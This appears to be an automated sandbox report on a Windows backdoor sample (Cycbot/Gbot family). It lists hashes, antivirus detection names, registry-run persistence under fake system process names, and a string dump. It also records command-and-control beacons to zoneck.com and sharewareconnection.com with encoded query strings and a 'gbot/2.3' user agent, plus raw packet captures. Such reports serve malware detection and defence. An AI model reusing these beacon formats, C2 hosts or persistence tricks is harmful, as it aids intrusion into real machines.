Analysis Date2015-01-17 02:25:40
MD5790d2b32b94d385cfa40a4b2a8de28bb
SHA17afd49dc06735eb56982f54429454037dcca3318

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e1d2f2316917cc8565b9b03c46b45b85 sha1: eefb44eccea353a42022e046d3359ae669aa406b size: 94720
Section.rdata md5: 90ea1a8f4920e7972810911a0026752a sha1: a567ae9d83ed7821d261d19054e9f2548e26660c size: 1024
Section.data md5: 227bd5bc15728f95a70bc816d5b9ba59 sha1: c6b77902175293cddd479bf4be50a4ba5a19cbea size: 21504
Section.rsrc md5: 86bab689a4572d78a73e55925f9e5dcc sha1: 3d0da0424018495f4d4e37529d2949bf4962e305 size: 1024
Timestamp2005-09-04 16:12:54
VersionPrivateBuild: 1423
PEhash35229193933e462618535c90896022f03827e568
IMPhashd693cb80d28194347960becacd722e8a
AV360 Safeno_virus
AVAd-AwareGen:Heur.Conjar.2
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)Gen:Heur.Conjar.2
AVAuthentiumW32/Goolbot.C.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Heur.Conjar.2
AVCA (E-Trust Ino)Win32/Cycbot.C!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Agent-216222
AVDr. WebTrojan.DownLoader1.43184
AVEmsisoftGen:Heur.Conjar.2
AVEset (nod32)Win32/Kryptik.IVA
AVFortinetW32/Krypt.NHL!tr
AVFrisk (f-prot)W32/Goolbot.C.gen!Eldorado
AVF-SecureTrojan-Downloader:W32/Renos.GTC
AVGrisoft (avg)Agent.5.BJ
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyPacked.Win32.Krap.hy
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.e
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.2
AVRisingTrojan.Win32.Generic.125FE1F7
AVSophosTroj/FakeAV-CDG
AVSymantecTrojan.Gen
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Maxplus.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSzoneck.com
Winsock DNS127.0.0.1
Winsock DNSsharewareconnection.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSzoneck.com
Type: A
208.79.234.132
DNSsharewareconnection.com
Type: A
216.240.159.81
DNSxibudific.cn
Type: A
HTTP GEThttp://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvAo1%2BjbwvgS917W65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GEThttp://sharewareconnection.com/im/s.cgi?tq=gHZutDyMv5rJeCG1J8K%2B1MWCJbP4lltXIA%3D%3D
User-Agent: gbot/2.3
HTTP GEThttp://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvAo1%2BjbwvgS917W65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GEThttp://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvAo1%2BjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP192.168.1.1:1032 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1033 ➝ 216.240.159.81:80
Flows TCP192.168.1.1:1034 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1035 ➝ 208.79.234.132:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427641 6f312532 426a6277 76675339   fBvAo1%2BjbwvgS9
0x00000040 (00064)   31375736 35724a71 6c4c6667 50695757   17W65rJqlLfgPiWW
0x00000050 (00080)   31636720 48545450 2f312e30 0d0a436f   1cg HTTP/1.0..Co
0x00000060 (00096)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000070 (00112)   0a486f73 743a207a 6f6e6563 6b2e636f   .Host: zoneck.co
0x00000080 (00128)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000a0 (00160)   2f322e33 0d0a0d0a                     /2.3....

0x00000000 (00000)   47455420 2f696d2f 732e6367 693f7471   GET /im/s.cgi?tq
0x00000010 (00016)   3d67485a 75744479 4d763572 4a654347   =gHZutDyMv5rJeCG
0x00000020 (00032)   314a384b 25324231 4d57434a 6250346c   1J8K%2B1MWCJbP4l
0x00000030 (00048)   6c745849 41253344 25334420 48545450   ltXIA%3D%3D HTTP
0x00000040 (00064)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000050 (00080)   3a20636c 6f73650d 0a486f73 743a2073   : close..Host: s
0x00000060 (00096)   68617265 77617265 636f6e6e 65637469   harewareconnecti
0x00000070 (00112)   6f6e2e63 6f6d0d0a 41636365 70743a20   on.com..Accept: 
0x00000080 (00128)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000090 (00144)   2067626f 742f322e 330d0a0d 0a626f74    gbot/2.3....bot
0x000000a0 (00160)   2f322e33 0d0a0d0a                     /2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427641 6f312532 426a6277 76675339   fBvAo1%2BjbwvgS9
0x00000040 (00064)   31375736 35724a71 6c4c6667 50695757   17W65rJqlLfgPiWW
0x00000050 (00080)   31636720 48545450 2f312e30 0d0a436f   1cg HTTP/1.0..Co
0x00000060 (00096)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000070 (00112)   0a486f73 743a207a 6f6e6563 6b2e636f   .Host: zoneck.co
0x00000080 (00128)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000a0 (00160)   2f322e33 0d0a0d0a                     /2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427641 6f312532 426a6277 76675339   fBvAo1%2BjbwvgS9
0x00000040 (00064)   31375836 35724a71 6c4c6667 50695757   17X65rJqlLfgPiWW
0x00000050 (00080)   31636720 48545450 2f312e30 0d0a436f   1cg HTTP/1.0..Co
0x00000060 (00096)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000070 (00112)   0a486f73 743a207a 6f6e6563 6b2e636f   .Host: zoneck.co
0x00000080 (00128)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000a0 (00160)   2f322e33 0d0a0d0a                     /2.3....


Strings
..
040904b0
1423
B&reak
C&ompile
&Data
MS Sans Serif
PrivateBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
0ZIryy
1M:] {
2Icc%XtC
4(-&Xc
}.5-gX^
5t*\~+
5'X8EX
68K	_q
[!6xoL
+`,7F<
(7,gXH
7kqVvk
	@7SIa
86EXGX
	8DXjZeXhd
8EXGX3
'8l5r7
8}opwq
aZ4DNZ
B;{}'$
B d*9_W
BZ~eyw<
C7-coS
c8HvM3
_c,c}[
cc2c\b
ccfXdX
CloseHandle
c<,M/I3<w'
CreateStdAccessibleObject
CreateThread
=cu',P
cV@S:[8$
@.data
DeleteCriticalSection
DW}LwA
DX9zDX>
DXeXEX
DXGX$X
\DX$Xc
DXX^)oq
EnterCriticalSection
EnumResourceNamesA
e@r%rQy
EX6ZwW
EX/7dX~
_	eXeX
eXfXh3
EXFXHC
EXhhlFre
ExitProcess
EXi/y}>
	EXU_H
eX=[%X
eX$XdX
EX%XZz
FindClose
FindFirstFileW
FreeEnvironmentStringsA
fX9=DXA
/FXJHT
/fXm*};
fXO+>IJ
fXW-IW<
[G\1h\
GetLastError
GetLocalTime
GetStartupInfoA
GetSystemTimeAsFileTime
/	g!:V
gX]:,1
^~GXDX)K
[*\gXgX8
gXNi'X
gXwEX? 
GXZ}k	
hhLoad
hhLoca
i5hP,O
IDXuOS
iMgX<nj
InitializeCriticalSection
j%b3Ti
jcu	Kg1SQ
j:dXTk
JdX=xi
JiFX/W
J/$Xv.
=JZGX'X
KERNEL32.dll
Klw{\r
kr*DOYC
KV0EZaa
#LClUD
LeaveCriticalSection
L@h6H~
)l	K]i
LLj%XO
.lnJn`
LoadLibraryA
\lovDX
LresultFromObject
>m7?oK
m/98z]
%mAV8Kh!
,mkGXA
M_MGX<$X
N2,]Iz+8tz
_N_-Bs
nfX|n(<
*nGXDX
^n:&XP
O*c1V;bI%
OgXtGX
OLEACC.dll
OQY;Sn
OTiTgX
[o}=WNl
p3o`zS4'
:>RCd{IA
`.rdata
ReadFile
	R?I}:
rM+'UPKJ
SetEndOfFile
SetFilePointer
TerminateThread
?TGXdX7
!This program cannot be run in DOS mode.
ThLibr
-TNdagF5
U8=DX.
UK.FXgX
[}U/y	
UzEX9tu
VeXWEX
v&;fv%6 
v_hg!8
VH%RD/
v,n|?GX
v[sG-W
;(Vw&X
:+VzO#
woFX/s
WriteFile
><$X)1
'X/471
X4DXfX
X4:(EX
'X5FXo
X5W$X$Xz
X6?7hC
x6J95{
'X:7gXxU
X87i;<
X8K\)I
X9+|&X
XDX4i1
XdX<fX
XDXgX@
XdXGXK
X(DXiYl
XDXJ$X~
XDXoJ]&XN
X>DX_v
X*<EX_
X*eX|I
XEX}N1
$X~EXo
'XEX$Xi
XeX'Xr
XEX$XV
X]|fX~
XfXDX3
XFXfXr
XfXGX4y
XgX<fX~
XGX~J9
%XGXM%X
'XgX)<$XDX
&X)_h3
&X^H_k
X\ik-GXA
XIN~%X
XIvUeXX
XjGX8i(
XJl^,}
XjyYM2
XkGX5K
%XK$Xo
Xl6gX1
XL].$X
X=:[neX
XngX:%XX
'X=NIv
XN,J|r
XO~LZ0
XOnEXC
&XOoTQ
)'X+]r
XU%XgX
X|u'XI)
%XV5dXP
XvN>lV
XV'X},h
XV&X/M.
XwDX^$X
%X)$X5R
X%XdX8WN
X$X<eXFX
Xx:fXc
XXGXDX
X'Xj.Ji
X:$Xk_O
x%XK%Xa
$XXn}m
X?XTeX
X%X?v2
X&XVFXo
XX$X{m?
X+'X%X&XY
X{+y5'X8o
XY%XeX'X
X(<ZfXz'X
YdX?=UP
y^<|h$X\
yjj['X
ym*wFX!
Y&WYOw>
y[%X.z
=YYdIc{
|yZfX\
zjiC0P"^
zZ|DX1